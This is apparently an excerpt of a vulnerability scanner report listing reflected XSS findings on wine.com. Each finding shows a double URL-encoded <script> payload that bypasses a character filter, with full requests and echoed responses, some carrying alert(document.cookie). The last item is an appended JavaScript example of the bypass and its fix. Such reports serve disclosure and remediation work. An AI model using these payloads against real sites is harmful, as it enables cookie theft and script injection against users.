2.75. http://www.wine.com/includes/analytics/s_remote_code.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/analytics/s_remote_code.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c47f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2003fe95c59 was submitted in the REST URL parameter 3. This input was echoed as c47f8"><script>alert(1)</script>2003fe95c59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/analytics/s_remote_code.jsc47f8%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e2003fe95c59 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33439


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/analytics/s_remote_code.jsc47f8"><script>alert(1)</script>2003fe95c59" value="" />
...[SNIP]...

2.76. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 190ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19b1a745d3c was submitted in the REST URL parameter 1. This input was echoed as 190ab"><script>alert(1)</script>19b1a745d3c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes190ab%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e19b1a745d3c/css/defaultsix.css HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:37 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:36 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33431


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes190ab"><script>alert(1)</script>19b1a745d3c/css/defaultsix.css" value="" />
...[SNIP]...

2.77. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce42%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede459d037ed was submitted in the REST URL parameter 2. This input was echoed as 5ce42"><script>alert(1)</script>de459d037ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/css5ce42%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ede459d037ed/defaultsix.css HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:47 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33431
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/css5ce42"><script>alert(1)</script>de459d037ed/defaultsix.css" value="" />
...[SNIP]...

2.78. http://www.wine.com/includes/css/defaultsix.css [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/css/defaultsix.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d73a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5dff43dcf33 was submitted in the REST URL parameter 3. This input was echoed as d73a5"><script>alert(1)</script>5dff43dcf33 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/css/defaultsix.cssd73a5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5dff43dcf33 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33431


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/css/defaultsix.cssd73a5"><script>alert(1)</script>5dff43dcf33" value="" />
...[SNIP]...

2.79. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 87245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef2fe37d33b was submitted in the REST URL parameter 1. This input was echoed as 87245"><script>alert(1)</script>ef2fe37d33b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes87245%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eef2fe37d33b/js/stateSelect.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:37 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:36 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33430


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes87245"><script>alert(1)</script>ef2fe37d33b/js/stateSelect.js" value="" />
...[SNIP]...

2.80. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a2e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef58af180709 was submitted in the REST URL parameter 2. This input was echoed as 9a2e2"><script>alert(1)</script>f58af180709 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js9a2e2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef58af180709/stateSelect.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:45 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:44 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33430


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js9a2e2"><script>alert(1)</script>f58af180709/stateSelect.js" value="" />
...[SNIP]...

2.81. http://www.wine.com/includes/js/stateSelect.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/stateSelect.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4c3d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e986c897d3dd was submitted in the REST URL parameter 3. This input was echoed as 4c3d6"><script>alert(1)</script>986c897d3dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js/stateSelect.js4c3d6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e986c897d3dd HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:53 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33430
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:52 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js/stateSelect.js4c3d6"><script>alert(1)</script>986c897d3dd" value="" />
...[SNIP]...

2.82. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1cba2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1401bd5b008 was submitted in the REST URL parameter 1. This input was echoed as 1cba2"><script>alert(1)</script>1401bd5b008 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes1cba2%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e1401bd5b008/js/winedotcom.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:39 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Length: 33429
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:38 GMT; domain=www.wine.com; path=/
Cache-control: private


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes1cba2"><script>alert(1)</script>1401bd5b008/js/winedotcom.js" value="" />
...[SNIP]...

2.83. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ca9bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b34047d04 was submitted in the REST URL parameter 2. This input was echoed as ca9bc"><script>alert(1)</script>78b34047d04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/jsca9bc%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e78b34047d04/winedotcom.js HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:47 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:46 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33429


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/jsca9bc"><script>alert(1)</script>78b34047d04/winedotcom.js" value="" />
...[SNIP]...

2.84. http://www.wine.com/includes/js/winedotcom.js [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /includes/js/winedotcom.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4921%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e114b2936cb3 was submitted in the REST URL parameter 3. This input was echoed as c4921"><script>alert(1)</script>114b2936cb3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /includes/js/winedotcom.jsc4921%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e114b2936cb3 HTTP/1.1
Host: www.wine.com
Proxy-Connection: keep-alive
Referer: http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%2528document.cookie%2529%253c%252fscript%253ef6545857e09
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; ASPSESSIONIDQSSTAQAD=ICPOLHNDHHJFHHMPPDLMCALO

Response

HTTP/1.1 404 Not Found
Date: Sun, 13 Feb 2011 14:21:56 GMT
Server: Microsoft-IIS/6.0
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
X-Powered-By: ASP.NET
Content-Type: text/html
Set-Cookie: SessionGUID=EC47EF5B%2D4230%2D427E%2DB1DC%2DC28871905368; expires=Mon, 13-Feb-2012 14:21:56 GMT; domain=www.wine.com; path=/
Cache-control: private
X-Strangeloop: Compression
Content-Length: 33429


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/includes/js/winedotcom.jsc4921"><script>alert(1)</script>114b2936cb3" value="" />
...[SNIP]...

2.85. http://www.wine.com/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a42df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6545857e09 was submitted in the REST URL parameter 3. This input was echoed as a42df"><script>alert(1)</script>f6545857e09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Request

GET /v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6545857e09 HTTP/1.1
Host: www.wine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
p3p: CP="OTI DSP COR CUR ADM TAI PSAo IVAo IVDo CONo HIS TELo OUR IND UNI FIN COM NAV INT PRE"
Set-Cookie: SessionGUID=DBA21E31%2D1D95%2D4BF7%2D9F56%2D4B371470A644; expires=Sat, 11-Feb-2012 22:05:46 GMT; domain=www.wine.com; path=/
Set-Cookie: ASPSESSIONIDACBBTDTS=DKPFPHNCCGJJAFLJLPONMAKD; path=/
Cache-control: private
Date: Fri, 11 Feb 2011 22:05:47 GMT
Connection: close
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html
Content-Length: 33302


<html>
<head>
   <title>Wine.com - Page Not Found</title>
   
<link rel="stylesheet" href="http://www.wine.com/includes/css/defaultsix.css">
<script language="JavaScript" src="http://www.wine.com/i
...[SNIP]...
<input type="hidden" name="404;http://www.wine.com:80/v6/giftcenter/Red-Envelope-Wine-Gifts-Product.aspxa42df"><script>alert(1)</script>f6545857e09" value="" />
...[SNIP]...

2.86. http://www.wine.com/v6/giftcenter/proflowersproduct.aspx [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wine.com
Path:   /v6/giftcenter/proflowersproduct.aspx

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be123%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef2a0408d74d was submitted in the REST URL parameter 3. This input was echoed as be123"><script>alert(1)</script>f2a0408d74d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks, but this check can be circumvented by double URL-encoding the required characters, because the value is URL-decoded again after the check is applied: for example, submitting %253c instead of the < character.
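As an added example (not code from the scan report or from wine.com), the following JavaScript models the double-decoding behaviour reported in 2.85 and 2.86 and the corresponding fix. The blocklist filter, the two decode stages and all function names are assumptions made for illustration; only the payload string is taken from the report:

```javascript
// Added example, not code from the scan report or from wine.com. A hypothetical
// model of the behaviour reported in 2.85 and 2.86: the web server decodes the
// request path once, a blocklist filter inspects that form, and the application
// decodes the value a second time before reflecting it into an HTML attribute.
// Single-encoded "<" is caught by the filter; double-encoded %253c is not.

// Hypothetical blocklist filter: rejects "<", ">" and '"' in the text it sees.
function containsBlockedChars(text) {
  return /[<>"]/.test(text);
}

// Vulnerable pipeline. Returns null when the filter blocks the request,
// otherwise the HTML fragment the 404 page would emit.
function vulnerableReflect(rawPath) {
  const serverDecoded = decodeURIComponent(rawPath);    // web server: first decode
  if (containsBlockedChars(serverDecoded)) return null;  // filter sees only this form
  const appDecoded = decodeURIComponent(serverDecoded);  // application: second decode
  return '<input type="hidden" name="404;' + appDecoded + '" value="" />';
}

// Canonicalise before validating: keep decoding until the value stops changing
// (or a malformed %-escape stops us) and reject anything still changing after
// maxRounds. A check applied to any earlier form is bypassed by adding a layer.
function canonicalDecode(rawPath, maxRounds = 4) {
  let current = rawPath;
  for (let i = 0; i < maxRounds; i++) {
    let next;
    try {
      next = decodeURIComponent(current);
    } catch (e) {
      return current; // malformed %-escape: nothing further decodes
    }
    if (next === current) return next;
    current = next;
  }
  throw new Error('value still decoding after ' + maxRounds + ' rounds; rejecting');
}

// Encode for an HTML attribute value regardless of what any filter decided:
// output encoding, not input blocklisting, is what actually stops the XSS.
function encodeHtmlAttr(text) {
  return text
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Fixed pipeline: canonicalise once, then encode on output.
function fixedReflect(rawPath) {
  const canonical = canonicalDecode(rawPath);
  return '<input type="hidden" name="404;' + encodeHtmlAttr(canonical) + '" value="" />';
}

// Payload from 2.85 (double-encoded) and its single-encoded form.
const doubleEncoded = 'a42df%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef6545857e09';
const singleEncoded = decodeURIComponent(doubleEncoded);

console.log('single-encoded:', vulnerableReflect(singleEncoded)); // null: blocked
console.log('double-encoded:', vulnerableReflect(doubleEncoded)); // raw <script> reflected
console.log('fixed:         ', fixedReflect(doubleEncoded));      // entity-encoded
```

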